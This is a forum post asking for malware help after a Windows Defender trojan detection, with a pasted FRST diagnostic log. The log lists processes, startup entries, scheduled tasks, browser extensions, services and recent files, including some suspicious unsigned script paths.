Please check my log

Posted: 20 Jan 2021 10:50
by chenny
Hello, please check my log. After the PC starts, an error message pops up and Windows Defender reports detection of the virus Trojan Downloader PowerShell.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 07:13:34)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Appwork GmbH -> AppWork GmbH) C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\JDownloader2.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <12>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mstsc.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-19]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-15]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-15]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-15]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 07:13 - 2021-01-20 07:14 - 000020784 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 07:13 - 2021-01-20 07:13 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 07:14 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 07:13 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\Program Files\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
